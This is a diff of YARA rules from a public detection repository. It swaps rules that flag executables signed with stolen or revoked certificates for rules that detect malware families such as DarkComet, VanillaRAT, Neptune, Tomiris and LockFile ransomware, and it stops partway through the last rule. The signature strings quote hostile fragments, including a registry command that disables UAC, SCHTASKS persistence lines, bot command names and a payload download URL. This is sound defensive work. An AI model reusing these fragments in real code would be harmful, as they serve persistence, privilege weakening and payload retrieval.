-		id = "180b2e63-7151-5899-8c12-7e4cd3bb2e0d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "8883e652-edab-5cbf-a4fa-963b437447d9"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2638-L2649"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7748-L7767"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "940d257253a0a1a3f70dcec1cb57e9ab08108138ce3b80c9f74228a8b702601c"
+		logic_hash = "4558002b424f7102f67fc44dfc37ac20f6013e25ae827c6aee0fc37231e2fa72"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "23c446940a9cdc9f502b92d7928e3b3fde6d3735"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\Windows\\System32\\*.drv" fullword wide
+		$s2 = "NYbr-Vk@" fullword ascii
+		$s3 = ":7:=:H:Q:W:\\:b:&;O;^;v;" fullword ascii
+		$o1 = { b0 34 aa fe c0 e2 fb b9 03 }
+		$o2 = { fe 00 ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 }
+		$o3 = { 6a 00 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe ff }
+		$o4 = { ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe }
+		$o5 = { 53 56 57 8d 85 70 ff ff ff 83 c0 0f 83 e0 f0 89 }
+		$o6 = { c7 85 68 ff ff ff 00 04 00 00 8b 85 6c ff ff ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures [ i ] . serial == "0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and all of ( $o* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4Af27Cd14F5C809Eec1F46E483F03898 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector04 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader / injector"
 		author = "ditekSHen"
-		id = "e7bbc10b-54fc-5950-99fc-80a459406780"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "fe423aee-6ff4-5fd0-9fa2-51dd0c27f54b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2651-L2662"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7769-L7790"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0297f156d1e4d1c20143953759000b286ac9e1f8864aa511e0e2f8fa5c3eac7f"
+		logic_hash = "ab9a047e53dec2cc5986522636783b5cb8aae7fc0297292d017ec22ee5750cce"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5fa9a98f003f2680718cbe3a7a3d57d7ba347ecb"
-		importance = 20
+
+	strings:
+		$s1 = "Runner" fullword ascii
+		$s2 = "DownloadPayload" fullword ascii
+		$s3 = "RunOnStartup" fullword ascii
+		$a1 = "Antis" fullword ascii
+		$a2 = "antiVM" fullword ascii
+		$a3 = "antiSandbox" fullword ascii
+		$a4 = "antiDebug" fullword ascii
+		$a5 = "antiEmulator" fullword ascii
+		$a6 = "enablePersistence" fullword ascii
+		$a7 = "enableFakeError" fullword ascii
+		$a8 = "DetectVirtualMachine" fullword ascii
+		$a9 = "DetectSandboxie" fullword ascii
+		$a10 = "DetectDebugger" fullword ascii
+		$a11 = "CheckEmulator" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DAhan Advertising planning" and pe.signatures [ i ] . serial == "4a:f2:7c:d1:4f:5c:80:9e:ec:1f:46:e4:83:f0:38:98" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 5 of ( $a* ) ) or 10 of ( $a* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_105765998695197De4109828A68A4Ee0 : FILE
+rule DITEKSHEN_MALWARE_Win_Darkcomet : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DarkComet"
 		author = "ditekSHen"
-		id = "97a4bad1-9b84-54e3-a1c2-6d01bd4cde4c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ae2412df-adae-5640-9404-7b093c5095b4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2664-L2675"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7792-L7812"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c251f28eec6f93522f5a3706e1abcfd892affa2b36ed84ec277dc0d4716ff667"
+		logic_hash = "444df3c914c47500018614af10036864b459e7873daf079b684352dbe52f0486"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "5ddae14820d6f189e637f90b81c4fdb78b5419dc"
-		importance = 20
+
+	strings:
+		$s1 = "%s, ClassID: %s" ascii
+		$s2 = "%s, ProgID: \"%s\"" ascii
+		$s3 = "#KCMDDC51#" ascii
+		$s4 = "#BOT#VisitUrl" ascii
+		$s5 = "#BOT#OpenUrl" ascii
+		$s6 = "#BOT#Ping" ascii
+		$s7 = "#BOT#RunPrompt" ascii
+		$s8 = "#BOT#CloseServer" ascii
+		$s9 = "#BOT#SvrUninstall" ascii
+		$s10 = "#BOT#URLUpdate" ascii
+		$s11 = "#BOT#URLDownload" ascii
+		$s12 = /BTRESULT(Close|Download|HTTP|Mass|Open|Ping\|Respond|Run|Syn|UDP|Uninstall\|uninstall|Update|Visit)/ ascii
+		$s13 = "dclogs\\" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cryptonic ApS" and pe.signatures [ i ] . serial == "10:57:65:99:86:95:19:7d:e4:10:98:28:a6:8a:4e:e0" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_53F575F7C33Ee007887F30680486Db5E : FILE
+rule DITEKSHEN_MALWARE_Win_Macoute : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Macoute"
 		author = "ditekSHen"
-		id = "8353ac89-1d98-5b05-a851-50d9e42f8f74"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0ecfb923-2e51-544e-984d-efdeeb175727"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2677-L2688"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7814-L7836"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "050d8c4dcb80cd637981c208c6d1316e9933d4f06bbf8af3717d2205a4f84f6d"
+		logic_hash = "1dffa48fe6c0ac053509b5f5994d323fd72d090da0f077b52c9bc33df6997964"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a42d8f60663dd86265e566f33d0ed5554e4c9a50"
-		importance = 20
+
+	strings:
+		$s1 = "scp%s%s%s%s" ascii
+		$s2 = "putfile %s %s" ascii
+		$s3 = "pscp|%s|%s:%s" ascii
+		$s4 = "connect %host %port\\n" ascii
+		$s5 = "/ecoute/spool/%s-%lu" ascii
+		$s6 = "<f n=\"%s\" s=\"%lu\" d=\"%d-%d-%d\"/>" ascii
+		$s7 = "CMPT;%s;%s;%s;%s;%s" ascii
+		$s8 = "%s\\apoScreen%lu.dll" ascii
+		$s9 = "/cap/%s%lu.jpg" ascii
+		$s10 = "INFO;%u;%u;%u;%d;%d;%d;%d;%d;%d;%d;%s" ascii
+		$s11 = "SUBJECT: %s is comming!" ascii
+		$s12 = "Content-type: multipart/mixed; boundary=\"#BOUNDARY#\"" ascii
+		$s13 = "FROM: %s@yahoo.com" ascii
+		$s14 = "<html><script language=\"JavaScript\">window.open(\"readme.eml\", null,\"resizable=no,top=6000,left=6000\")</script></html>" ascii
+		$s15 = "<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RET PTY. LTD." and pe.signatures [ i ] . serial == "53:f5:75:f7:c3:3e:e0:07:88:7f:30:68:04:86:db:5e" )
+		uint16( 0 ) == 0x5a4d and 10 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7E89B9Df006Bd1Aa4C48D865039634Ca : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminer04 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects coinmining malware"
 		author = "ditekSHen"
-		id = "aa208da9-06e2-5bf5-8453-a545c640efa7"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d90d8ad3-20b7-5bb4-8c58-3488c60ed9a2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2690-L2701"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7838-L7858"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "825e4b69aec565b6ef6b4ac2394f5a562a84615e3c91331934fa378152635df4"
+		logic_hash = "2ef60dbf0bac3d5910635bb011a45e5ebc1392094b10425604fa9dd290198f8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "63ad44acaa7cd7f8249423673fbf3c3273e7b2dc"
-		importance = 20
+
+	strings:
+		$s1 = "createDll" fullword ascii
+		$s2 = "getTasks" fullword ascii
+		$s3 = "SetStartup" fullword ascii
+		$s4 = "loadUrl" fullword ascii
+		$s5 = "Processer" fullword ascii
+		$s6 = "checkProcess" fullword ascii
+		$s7 = "runProcess" fullword ascii
+		$s8 = "createDir" fullword ascii
+		$cnc1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide
+		$cnc2 = "?hwid=" fullword wide
+		$cnc3 = "?timeout=1" fullword wide
+		$cnc4 = "&completed=" fullword wide
+		$cnc5 = "/cmd.php" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dummy" and pe.signatures [ i ] . serial == "7e:89:b9:df:00:6b:d1:aa:4c:48:d8:65:03:96:34:ca" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) and 1 of ( $cnc* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ddeb53F957337Fbeaf98C4A615B149D : FILE
+rule DITEKSHEN_MALWARE_Win_Sidewalk : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SideWalk"
 		author = "ditekSHen"
-		id = "13347f66-c726-59be-9d0e-871512335bbd"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ab82b83a-a279-555a-83c2-6340431b10da"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2703-L2714"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7860-L7880"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4932dcea41879fd29250456cfef7a32a1303f599adbd4b61d91cb2e7e22cf5a2"
+		logic_hash = "6885a1ad69d61fa5875ee0db949071e84390fc2db4307c412b32cd17c0806f6a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "91cabea509662626e34326687348caf2dd3b4bba"
-		importance = 20
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mozilla Corporation" and pe.signatures [ i ] . serial == "0d:de:b5:3f:95:73:37:fb:ea:f9:8c:4a:61:5b:14:9d" )
-}
+	strings:
+		$s1 = "Decommit" fullword ascii
+		$s2 = "Shellc0deRunner" fullword ascii
+		$s3 = "shellc0de" fullword ascii
+		$s4 = "C:\\Windows\\System32\\msdt.exe" fullword wide
+		$s5 = "StartProcessWOPid" fullword ascii
+		$s6 = "StartProcessWithParent" fullword ascii
+		$m1 = "alloctype" fullword ascii
+		$m2 = "ThreadIoPriority" fullword ascii
+		$m3 = "PebAddress" fullword ascii
+		$m4 = "dotnet.4.x64.dll" fullword wide
+		$m5 = "LogonNetCredentialsOnly" fullword ascii
+		$m6 = "ThreadIdealProcessor" fullword ascii
+		$m7 = "LogonWithProfile" fullword ascii
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C88Af896B6452241Fe00E3Aaec11B1F8 : FILE
+	condition:
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $m* ) or ( 11 of them ) )
+}
+rule DITEKSHEN_MALWARE_Win_Vanillarat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects VanillaRAT"
 		author = "ditekSHen"
-		id = "4d73705a-e980-5aa0-a326-e35990226e37"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "70c2cd1a-a6d4-562e-a6fc-c16a9e87c6b7"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2716-L2727"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7882-L7902"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a5f290f9479189ff83bf5da3a3d086453c9230311a48f4c0bd4654024ebeef8"
+		logic_hash = "d7b90ac88a50693ec4bb0676c04f5d161f04f67970ea60d80e79d774da75bfdc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9ce1cbf5be77265af2a22e28f8930c2ac5641e12"
-		importance = 20
+
+	strings:
+		$stub = "VanillaStub." ascii wide
+		$s1 = "Client.Send: " wide
+		$s2 = "Connected to chat" fullword wide
+		$s3 = "GetStoredPasswords" fullword wide
+		$s4 = "Started screen locker." fullword wide
+		$s5 = "[<\\MOUSE>]" fullword wide
+		$s6 = "YOUR SCREEN HAS BEEN LOCKED!" fullword wide
+		$s7 = "record recsound" fullword wide
+		$f1 = "<StartRemoteDestkop>d__" ascii
+		$f2 = "<ConnectLoop>d__" ascii
+		$f3 = "<Scan0>k__" ascii
+		$f4 = "<RemoteShellActive>k__" ascii
+		$f5 = "KillClient" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TeamViewer Germany GmbH" and pe.signatures [ i ] . serial == "00:c8:8a:f8:96:b6:45:22:41:fe:00:e3:aa:ec:11:b1:f8" )
+		uint16( 0 ) == 0x5a4d and ( ( $stub and ( 2 of ( $s* ) or 2 of ( $f* ) ) ) or 6 of ( $s* ) or all of ( $f* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_09E015E98E4Fabcc9Ac43E042C96090D : FILE
+rule DITEKSHEN_MALWARE_Win_Sectoprat : FILE
 {
 	meta:
-		description = "Detects BestEncrypt commercial disk encryption and wiping software signing certificate"
+		description = "Detects SectopRAT"
 		author = "ditekSHen"
-		id = "577cff87-b676-598b-acea-e7c01df0ef15"
-		date = "2020-11-19"
-		modified = "2024-10-04"
-		reference = "https://blog.macnica.net/blog/2020/11/dtrack.html"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2729-L2742"
+		id = "d6594834-24d7-5e86-84b5-5a7920e7bc89"
+		date = "2020-11-06"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7904-L7929"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77f9f50c6dd862419edaa7c3fcee0ce3f607a5b7b939d7844969082ab9777bbf"
+		logic_hash = "b4048f837c02560a8b650247173be25893b466e5cec8f2784eea58172f973822"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "04e407118516053ff248503b31d6eec6daf4a809"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\.\\root\\cimv2:Win32_Process" wide
+		$s2 = "\\\\.\\root\\cimv2:CIM_DataFile.Name=" wide
+		$s3 = "^.*(?=Windows)" fullword wide
+		$s4 = "C:\\Windows\\System32\\cmd.exe" wide
+		$s5 = "C:\\Windows\\explorer.exe" wide
+		$s6 = "Disabling IE protection" wide
+		$s7 = "stream started succces" wide
+		$b1 = "/C start Firefox" wide
+		$b2 = "/C start chrome" wide
+		$b3 = "/C start iexplore" wide
+		$m1 = "DefWindowProc" fullword ascii
+		$m2 = "AuthStream" fullword ascii
+		$m3 = "KillBrowsers" fullword ascii
+		$m4 = "GetAllNetworkInterfaces" fullword ascii
+		$m5 = "EnumDisplayDevices" fullword ascii
+		$m6 = "RemoteClient.Packets" fullword ascii
+		$m7 = "IServerPacket" fullword ascii
+		$m8 = "keybd_event" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jetico Inc. Oy" and pe.signatures [ i ] . serial == "09:e0:15:e9:8e:4f:ab:cc:9a:c4:3e:04:2c:96:09:0d" )
+		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) and 2 of ( $b* ) ) or all of ( $s* ) or ( all of ( $b* ) and ( 4 of ( $s* ) or 5 of ( $m* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_118D813D830F218C0F46D4Fc : FILE
+rule DITEKSHEN_MALWARE_Win_Neptune : FILE
 {
 	meta:
-		description = "Detects BestEncrypt commercial disk encryption and wiping software signing certificate"
+		description = "Detects Neptune keylogger / infostealer"
 		author = "ditekSHen"
-		id = "b14b14c8-202d-533d-97dc-c6336ddf75c4"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0f619bea-f00b-5078-95a4-83306e3e87b4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2744-L2755"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7931-L7953"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3240504794394c06f050ef3eb5ef82e0b476e2bbeabfb394fc4646e98bc6e976"
+		logic_hash = "e3298bf55f89180ed7e9f7ad35b59d39284a5143fd69fa2a4fbc27d91fb2fbd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "bd16f70bf6c2ef330c5a4f3a27856a0d030d77fa"
-		importance = 20
+
+	strings:
+		$x1 = "your keylogger has been freshly installed on" wide
+		$x2 = "Attached is a screenshot of the victim" wide
+		$x3 = "color: rgb(2, 84, 138);'>Project Neptune</span><br>" wide
+		$x4 = ">{Monitor Everything}</span><br><br>" wide
+		$x5 = "[First Run] Neptune" wide
+		$x6 = "Neptune - " wide
+		$s1 = "Melt" fullword wide
+		$s2 = "Hide" fullword wide
+		$s3 = "SDDate+" fullword wide
+		$s4 = "DelOff+" fullword wide
+		$s5 = "MsgFalse+" fullword wide
+		$s6 = "Clipboard:" fullword wide
+		$s7 = "information is valid and working!" wide
+		$s8 = ".exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" wide
+		$s9 = "http://www.exampleserver.com/directfile.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shang Hai Shen Wei Wang Luo Ke Ji You Xian Gong Si" and pe.signatures [ i ] . serial == "11:8d:81:3d:83:0f:21:8c:0f:46:d4:fc" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 7 of ( $s* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2304Ecf0Ea2B2736Beddd26A903Ba952 : FILE
+rule DITEKSHEN_MALWARE_Win_Tomiris : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Tomiris"
 		author = "ditekSHen"
-		id = "3e064799-2333-5d10-8841-8d0a44ad9c1b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "86efd4fb-3c76-504e-b367-132aee59e09a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2757-L2768"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7955-L7978"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c10695440ec4e39cf5b51c926ceeacc13caf3a58006c64b0168a04b4755978a6"
+		logic_hash = "1d9baeb6db2e849dd053c3fc735984e23b9cead39cf166f8a544ee5a439185d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d59a63e230cef77951cb73a8d65576f00c049f44"
-		importance = 20
+
+	strings:
+		$f1 = "main.workPath" ascii
+		$f2 = "main.selfName" ascii
+		$f3 = "main.infoServerAddr" ascii
+		$f4 = "main.configFileName" ascii
+		$s1 = "C:/Projects/go/src/Tomiris/main.go" ascii
+		$s2 = "C:/GO/go1.16.2/src/os/user/lookup_windows.go" ascii
+		$s3 = "C:\\GO\\go1.16.2" ascii
+		$s4 = ".html.jpeg.json.wasm.webp/p/gf/p/kk1562515" ascii
+		$s5 = "\" /ST 10:00alarm clockassistQueueavx512vbmi2avx512vnniwbad" ascii
+		$s6 = "write /TR \" Value addr= alloc base  code= ctxt: curg= free  goid  jobs= list= m->p=" ascii
+		$t1 = "SCHTASKS /DELETE /F /TN \"%s\"" ascii
+		$t2 = "SCHTASKS /CREATE /SC DAILY /TN" ascii
+		$t3 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"%s\" /ST %s" ascii
+		$t4 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"'%s' %s\" /ST %s" ascii
+		$r1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii
+		$r2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x88\\x90\\xE9\\x83\\xBD\\xE5\\x90\\x89\\xE8\\x83\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE8\\xB4\\xA3\\xE4\\xBB\\xBB\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "23:04:ec:f0:ea:2b:27:36:be:dd:d2:6a:90:3b:a9:52" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $f* ) and 3 of ( $s* ) and 2 of ( $t* ) and 1 of ( $r* ) ) or ( 4 of ( $s* ) and 2 of ( $t* ) and 1 of ( $r* ) ) or 12 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4D78E90E0950Fc630000000055657E1A : FILE
+rule DITEKSHEN_MALWARE_Win_Jennlog : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects JennLog loader"
 		author = "ditekSHen"
-		id = "bb48d309-e7b8-5c39-b989-cce4093b2082"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "38f8cd13-f157-5cce-bf04-80c29d254144"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2770-L2781"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7980-L7996"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c2a3714173defa7b8e97ea92f8f85fb47011099bdc24067aafa273ebdd282f0f"
+		logic_hash = "085a4783c7c01ec95491d9999d1835ad9ab3dc70d77b944578e097b3ffe3a627"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "fd010fdee2314f5d87045d1d7bf0da01b984b0fe"
-		importance = 20
+
+	strings:
+		$x1 = "%windir%\\system32\\rundll32.exe advapi32.dll,ProcessIdleTasks" fullword wide
+		$x2 = "https://fkpageintheworld342.com" fullword wide
+		$s1 = "ExecuteInstalledNodeAndDelete" fullword ascii
+		$s2 = "ProcessExsist" fullword ascii
+		$s3 = "helloworld.Certificate.txt" fullword wide
+		$s4 = "ASCII85 encoded data should begin with '" fullword wide
+		$s5 = "] WinRE config file path: C:\\" ascii
+		$s6 = "] Parameters: configWinDir: NULL" ascii
+		$s7 = "] Update enhanced config info is enabled." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Telus Health Solutions Inc." and pe.signatures [ i ] . serial == "4d:78:e9:0e:09:50:fc:63:00:00:00:00:55:65:7e:1a" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) or ( all of ( $x* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0092Bc051F1811Bb0B86727C36394F7849 : FILE
+rule DITEKSHEN_MALWARE_Win_Lockfile : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LockFile ransomware"
 		author = "ditekSHen"
-		id = "9ffef880-ed00-54a7-8eb2-995c5c4e74f1"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "762ac376-43ff-56d2-b279-2879ce6d8542"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2783-L2794"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7998-L8014"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bdf847f95bc6cc50513b76c57c3e76bc17caacd3419baabb2cab0161feb67508"
+		logic_hash = "28c8aa8931d599e5a1860fe2ed0b8172e709dad1a48a319858a907fa775af293"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "d1f9930521e172526a9f018471d4575d60d8ad8f"
-		importance = 20
+
+	strings:
+		$x1 = "LOCKFILE" fullword ascii
+		$x2 = "25a01bb859125507013a2fe9737d3c33" fullword ascii
+		$s1 = "</key>" fullword ascii
+		$s2 = "<computername>%s</computername>" fullword ascii
